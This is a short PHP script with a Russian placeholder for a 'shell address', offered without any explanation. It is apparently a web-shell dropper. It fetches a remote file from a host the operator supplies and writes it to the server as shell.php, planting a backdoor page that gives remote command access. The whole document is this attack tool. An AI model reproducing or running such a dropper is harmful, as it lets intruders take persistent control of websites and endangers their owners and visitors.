<?php $filen="Адресс шелла"; $file_new="shell.php"; $data = implode("", file($filen)); $fp = fopen($file_new, "w"); fputs($fp, $data); fclose($fp); ?>